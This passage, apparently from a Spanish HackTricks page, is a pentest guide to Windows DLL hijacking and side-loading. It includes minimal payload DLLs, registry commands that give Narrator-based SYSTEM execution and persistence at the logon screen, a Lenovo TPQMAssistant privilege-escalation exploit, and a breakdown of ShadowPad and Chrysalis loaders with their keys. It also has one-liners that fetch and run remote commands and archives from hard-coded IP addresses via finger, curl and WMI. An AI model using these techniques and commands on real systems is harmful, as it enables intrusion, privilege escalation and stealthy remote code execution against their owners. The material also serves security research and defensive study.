#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Estudio de caso: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe todavía busca una DLL de localización predecible y específica por idioma al iniciarse, que puede secuestrarse para permitir la ejecución arbitraria de código y la persistencia.

Datos clave
- Ruta de sondeo (compilaciones actuales): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Ruta antigua (compilaciones anteriores): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Si existe una DLL controlada por un atacante y escribible en la ruta OneCore, se carga y `DllMain(DLL_PROCESS_ATTACH)` se ejecuta. No se requieren exports.

Descubrimiento con Procmon
- Filtro: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Inicia Narrator y observa el intento de carga de la ruta anterior.

DLL mínima
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

Silencio OPSEC

• Un hijack ingenuo mostrará/resaltará la UI. Para mantenerse silencioso, al adjuntarse enumera los hilos de Narrator, abre el hilo principal (OpenThread(THREAD_SUSPEND_RESUME)) y SuspendThread sobre él; continúa en tu propio hilo. Ver PoC para el código completo.

Activación y persistencia mediante la configuración de Accessibility

• Contexto de usuario (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Con lo anterior, al arrancar Narrator se carga la DLL plantada. En el escritorio seguro (pantalla de inicio de sesión), pulsa CTRL+WIN+ENTER para iniciar Narrator; tu DLL se ejecuta como SYSTEM en el escritorio seguro.

Ejecución SYSTEM activada por RDP (movimiento lateral)

• Permitir classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Conéctate por RDP al host; en la pantalla de inicio de sesión pulsa CTRL+WIN+ENTER para lanzar Narrator; tu DLL se ejecuta como SYSTEM en el escritorio seguro.
• La ejecución se detiene cuando la sesión RDP se cierra — inyectar/migrar rápidamente.

Bring Your Own Accessibility (BYOA)

• Puedes clonar una entrada de registro de Accessibility Tool (AT) incorporada (por ejemplo, CursorIndicator), editarla para que apunte a un binario/DLL arbitrario, importarla y luego establecer configuration a ese nombre de AT. Esto sirve como proxy para la ejecución arbitraria bajo el framework de Accessibility.

Notas

• Escribir bajo %windir%\System32 y modificar valores de HKLM requiere privilegios de administrador.
• Toda la lógica del payload puede residir en DLL_PROCESS_ATTACH; no se necesitan exports.

Estudio de caso: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Detalles de la vulnerabilidad

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Implementación del exploit

Un atacante puede colocar un stub malicioso hostfxr.dll en el mismo directorio, aprovechando la DLL faltante para lograr ejecución de código en el contexto del usuario:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Flujo de ataque

1. Como usuario estándar, colocar hostfxr.dll en C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Esperar a que la tarea programada se ejecute a las 9:30 AM en el contexto del usuario actual.
3. Si hay un administrador conectado cuando la tarea se ejecuta, la DLL maliciosa se ejecuta en la sesión del administrador con integridad media.
4. Encadenar técnicas estándar de UAC bypass para elevarse de integridad media a privilegios SYSTEM.

Caso de estudio: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Los actores de amenazas suelen combinar droppers basados en MSI con DLL side-loading para ejecutar payloads bajo un proceso firmado y de confianza.

Chain overview

• El usuario descarga el MSI. Una CustomAction se ejecuta silenciosamente durante la instalación GUI (por ejemplo, LaunchApplication o una acción VBScript), reconstruyendo la siguiente etapa a partir de recursos incrustados.
• El dropper escribe un EXE legítimo firmado y una DLL maliciosa en el mismo directorio (ejemplo: Avast-signed wsc_proxy.exe + wsc.dll controlada por el atacante).
• Cuando se inicia el EXE firmado, el orden de búsqueda de DLL de Windows carga wsc.dll desde el directorio de trabajo primero, ejecutando el código del atacante bajo un padre firmado (ATT&CK T1574.001).

MSI analysis (what to look for)

• Tabla CustomAction:
• Buscar entradas que ejecuten ejecutables o VBScript. Patrón sospechoso de ejemplo: LaunchApplication ejecutando un archivo incrustado en segundo plano.
• En Orca (Microsoft Orca.exe), inspeccionar las tablas CustomAction, InstallExecuteSequence y Binary.
• payloads incrustados/divididos en el CAB del MSI:
• Extracción administrativa: msiexec /a package.msi /qb TARGETDIR=C:\out
• O usar lessmsi: lessmsi x package.msi C:\out
• Buscar múltiples fragmentos pequeños que son concatenados y descifrados por una CustomAction VBScript. Flujo común:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Practical sideloading with wsc_proxy.exe

• Coloca estos dos archivos en la misma carpeta:
• wsc_proxy.exe: host legítimo firmado (Avast). El proceso intenta cargar wsc.dll por nombre desde su directorio.
• wsc.dll: attacker DLL. Si no se requieren exports específicos, DllMain puede ser suficiente; de lo contrario, construye una proxy DLL y reenvía los exports requeridos a la biblioteca genuina mientras ejecutas el payload en DllMain.
• Construye un payload DLL mínimo:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Para requisitos de exportación, use un framework de proxy (p. ej., DLLirant/Spartacus) para generar un DLL de reenvío que además ejecute su payload.

• Esta técnica se basa en la resolución de nombres de DLL por el binario anfitrión. Si el anfitrión usa rutas absolutas o flags de carga segura (p. ej., LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), el hijack puede fallar.

• KnownDLLs, SxS, y forwarded exports pueden influir en la precedencia y deben tenerse en cuenta al seleccionar el binario anfitrión y el conjunto de exports.

Tríadas firmadas + payloads cifrados (estudio de caso ShadowPad)

Check Point describió cómo Ink Dragon despliega ShadowPad usando una tríada de tres archivos para mezclarse con software legítimo mientras mantiene el payload principal cifrado en disco:

1. EXE anfitrión firmado – se abusan proveedores como AMD, Realtek o NVIDIA (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Los atacantes renombran el ejecutable para que parezca un binario de Windows (por ejemplo conhost.exe), pero la firma Authenticode sigue siendo válida.
2. Malicious loader DLL – dejado junto al EXE con un nombre esperado (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). La DLL suele ser un binario MFC ofuscado con el framework ScatterBrain; su único trabajo es localizar el blob cifrado, descifrarlo y mapear ShadowPad reflectivamente.
3. Encrypted payload blob – a menudo almacenado como <name>.tmp en el mismo directorio. Después de mapear en memoria el payload descifrado, el loader elimina el archivo TMP para destruir evidencia forense.

Notas de tradecraft:

• Renombrar el EXE firmado (manteniendo el OriginalFileName original en la cabecera PE) le permite hacerse pasar por un binario de Windows y a la vez retener la firma del proveedor, así que reproduzca la costumbre de Ink Dragon de dejar binarios con apariencia de conhost.exe que en realidad son utilidades de AMD/NVIDIA.
• Como el ejecutable sigue siendo de confianza, la mayoría de controles de allowlisting solo requieren que su DLL malicioso esté junto a él. Enfoque en personalizar el loader DLL; el padre firmado típicamente puede ejecutarse sin modificaciones.
• El decryptor de ShadowPad espera que el blob TMP viva junto al loader y sea escribible para poder poner a cero el archivo tras mapearlo. Mantenga el directorio escribible hasta que el payload cargue; una vez en memoria el archivo TMP puede eliminarse de forma segura por OPSEC.

LOLBAS stager + cadena de sideloading con archivo por etapas (finger → tar/curl → WMI)

Los operadores combinan DLL sideloading con LOLBAS de modo que el único artefacto personalizado en disco sea la DLL maliciosa junto al EXE de confianza:

• Remote command loader (Finger): PowerShell oculto lanza cmd.exe /c, extrae comandos de un servidor Finger y los pasa a cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host recupera texto TCP/79; | cmd ejecuta la respuesta del servidor, permitiendo a los operadores rotar la segunda etapa en el lado del servidor.

• Built-in download/extract: Descargue un archivo con una extensión benign, desempáquelo y coloque el objetivo de sideload y la DLL bajo una carpeta aleatoria %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L oculta el progreso y sigue redirecciones; tar -xf usa el tar incorporado de Windows.

• WMI/CIM launch: Inicie el EXE vía WMI para que la telemetría muestre un proceso creado por CIM mientras carga la DLL colocada junto a él:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Funciona con binarios que prefieren DLL locales (p. ej., intelbq.exe, nearby_share.exe); el payload (p. ej., Remcos) se ejecuta bajo el nombre de confianza.

• Hunting: Alarme sobre forfiles cuando /p, /m y /c aparezcan juntos; poco común fuera de scripts administrativos.

Estudio de caso: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Una intrusión reciente de Lotus Blossom abusó de una cadena de actualización de confianza para entregar un dropper empaquetado con NSIS que preparó un DLL sideload además de payloads completamente en memoria.

Flujo de tradecraft

• update.exe (NSIS) crea %AppData%\Bluetooth, lo marca HIDDEN, deja un Bitdefender Submission Wizard renombrado BluetoothService.exe, un log.dll malicioso y un blob cifrado BluetoothService, y luego lanza el EXE.
• El EXE anfitrión importa log.dll y llama a LogInit/LogWrite. LogInit carga el blob mediante mmap; LogWrite lo descifra con un stream personalizado basado en LCG (constantes 0x19660D / 0x3C6EF35F, material de clave derivado de un hash previo), sobrescribe el buffer con shellcode en texto claro, libera temporales y salta a él.
• Para evitar una IAT, el loader resuelve APIs hasheando nombres de export con FNV-1a basis 0x811C9DC5 + prime 0x1000193, luego aplicando una avalanche estilo Murmur (0x85EBCA6B) y comparando contra hashes objetivo salados.

Shellcode principal (Chrysalis)

• Descifra un módulo principal tipo PE repitiendo add/XOR/sub con la clave gQ2JR&9; durante cinco pasadas, luego carga dinámicamente Kernel32.dll → GetProcAddress para terminar la resolución de imports.
• Reconstruye cadenas de nombres de DLL en tiempo de ejecución mediante transformaciones por carácter de rotación de bits/XOR, luego carga oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Usa un segundo resolver que recorre la PEB → InMemoryOrderModuleList, analiza cada tabla de exports en bloques de 4 bytes con mezclado estilo Murmur, y solo recurre a GetProcAddress si el hash no se encuentra.

Configuración embebida & C2

• La config vive dentro del archivo BluetoothService dejado en offset 0x30808 (tamaño 0x980) y es RC4-descifrada con la clave qwhvb^435h&*7, revelando la URL de C2 y el User-Agent.
• Los beacons construyen un perfil del host delimitado por puntos, anteponen la etiqueta 4Q, luego lo RC4-encriptan con la clave vAuig34%^325hGV antes de HttpSendRequestA sobre HTTPS. Las respuestas se RC4-descifran y se despachan por un switch de etiquetas (4T shell, 4V exec de proceso, 4W/4X escritura de archivo, 4Y lectura/exfil, 4\\ desinstalar, 4 enumeración de unidades/archivos + casos de transferencia por fragmentos).
• El modo de ejecución se condiciona por args de CLI: sin args = instalar persistencia (servicio/clave Run) apuntando a -i; -i relanza self con -k; -k omite la instalación y ejecuta el payload.

Loader alternativo observado

• La misma intrusión dejó Tiny C Compiler y ejecutó svchost.exe -nostdlib -run conf.c desde C:\ProgramData\USOShared\, con libtcc.dll al lado. El código C provisto por el atacante incrustó shellcode, lo compiló y ejecutó en memoria sin tocar el disco con un PE. Replicar con:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Esta etapa de compile-and-run basada en TCC importó Wininet.dll en tiempo de ejecución y descargó un shellcode de segunda etapa desde un hardcoded URL, proporcionando un loader flexible que se hace pasar por una ejecución de compilador.

References

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Revisa los planes de suscripción!
• Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.